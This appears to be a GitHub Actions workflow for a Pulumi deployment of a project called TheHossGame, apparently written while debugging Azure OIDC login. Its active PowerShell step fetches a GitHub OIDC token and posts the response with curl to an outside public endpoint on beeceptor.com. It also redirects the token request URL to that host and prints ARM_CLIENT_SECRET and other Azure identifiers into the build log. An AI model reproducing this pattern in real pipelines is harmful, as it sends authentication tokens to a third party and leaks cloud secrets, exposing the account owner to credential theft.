name: Deploy Pulumi
on:
  push:
    branches: [main]

jobs:
  deployment:
    name: Preview
    runs-on: ubuntu-latest
    permissions:
      id-token: write
      contents: read
    steps:
      # - uses: actions/checkout@v2

      # - uses: actions/setup-dotnet@v1
      #   with:
      #     dotnet-version: 6.0.x

      # - uses: actions/setup-dotnet@v1
      #   with:
      #     dotnet-version: 3.1.x

      # - name: OIDC Login to Azure Public Cloud with AzPowershell (enableAzPSSession true)
      #   uses: azure/login@v1
      #   with:
      #     client-id: ${{ secrets.AZURE_CLIENT_ID }}
      #     tenant-id: ${{ secrets.AZURE_TENANT_ID }}
      #     subscription-id: ${{ secrets.AZURE_SUBSCRIPTION_ID }}
      #     enable-AzPSSession: true

      - name: Azure PowerShell Action
        uses: Azure/powershell@v1
        with:
          # Specify the Az PowerShell script here.
          inlineScript: |
            cd src/TheHossGame.Cloud
            Write-Host '👉 Selecting stack'
            pulumi stack select thehossgame

            Write-Host '👉 Calling OIDC token endpoint'
            Write-Host "ACTIONS_ID_TOKEN_REQUEST_URL: "$env:ACTIONS_ID_TOKEN_REQUEST_URL
            $azureTokenResponse = curl -H "Authorization: bearer $env:ACTIONS_ID_TOKEN_REQUEST_TOKEN" "$env:ACTIONS_ID_TOKEN_REQUEST_URL&audience=api://AzureADTokenExchange"
            curl https://thehossgame.free.beeceptor.com --data-raw $azureTokenResponse.value
            curl https://thehossgame.free.beeceptor.com --data-raw ($azureTokenResponse | ConvertFrom-Json)
            curl https://thehossgame.free.beeceptor.com --data-raw ($azureTokenResponse | ConvertFrom-Json).value

            Write-Host '👉 Printing environment variables'
            Write-Host "azureTokenResponse: "$azureTokenResponse
            Write-Host "azureTokenResponse.value: "$azureTokenResponse.value
            Write-Host "azureTokenResponse.value | ConvertFrom-Json: "$azureTokenResponse.value | ConvertFrom-Json
            Write-Host "ARM_CLIENT_SECRET: "$env:ARM_CLIENT_SECRET
            Write-Host "AZURE_TENANT_ID: "$env:AZURE_TENANT_ID
            Write-Host "AZURE_SUBSCRIPTION_ID: "$env:AZURE_SUBSCRIPTION_ID
            Write-Host "ACTIONS_ID_TOKEN_REQUEST_URL: "$env:ACTIONS_ID_TOKEN_REQUEST_URL

            Write-Host '👉 Setting client secret'
            pulumi config set azure-native:clientSecret $azureTokenResponse.value --secret
            Write-Host '👉 Setting client id'
            pulumi config set azure-native:clientId $env:ARM_CLIENT_ID
            Write-Host '👉 Setting tenant id'
            pulumi config set azure-native:tenantId $env:ARM_TENANT_ID
            Write-Host '👉 Setting subscription id'
            pulumi config set azure-native:subscriptionId $env:ARM_SUBSCRIPTION_ID
            pulumi preview
          azPSVersion: latest
        env:
          PULUMI_ACCESS_TOKEN: ${{ secrets.PULUMI_ACCESS_TOKEN }}
          ACTIONS_ID_TOKEN_REQUEST_TOKEN: ${{ env.ACTIONS_ID_TOKEN_REQUEST_TOKEN }}
          ACTIONS_ID_TOKEN_REQUEST_URL: https://thehossgame.free.beeceptor.com
          ARM_CLIENT_ID: ${{ secrets.AZURE_CLIENT_ID }}
          ARM_TENANT_ID: ${{ secrets.AZURE_TENANT_ID }}
          ARM_SUBSCRIPTION_ID: ${{ secrets.AZURE_SUBSCRIPTION_ID }}

      # - uses: pulumi/actions@v3
      #   with:
      #     command: preview
      #     stack-name: thehossgame
      #     work-dir: src/TheHossGame.Cloud
      #   env:
      #     PULUMI_ACCESS_TOKEN: ${{ secrets.PULUMI_ACCESS_TOKEN }}
      #     ARM_SKIP_CREDENTIALS_VALIDATION: true

      # - name: "Run Pulumi"
      #   run: |
      #     cd src/TheHossGame.Cloud
      #     ls
      #     dotnet build -nologo 
      #     pulumi stack select thehossgame
      #     $env:servicePrincipalId, $env:servicePrincipalKey, $env:tenantId
      #     curl -H "Authorization: bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN" "$ACTIONS_ID_TOKEN_REQUEST_URL&audience=api://AzureADTokenExchange"
      #     pulumi preview
      #   env:
      #     PULUMI_ACCESS_TOKEN: ${{ secrets.PULUMI_ACCESS_TOKEN }}
      #     ARM_CLIENT_ID: ${{ secrets.AZURE_CLIENT_ID }}
      #     ARM_TENANT_ID: ${{ secrets.AZURE_TENANT_ID }}
      #     ARM_SUBSCRIPTION_ID: ${{ secrets.AZURE_SUBSCRIPTION_ID }}
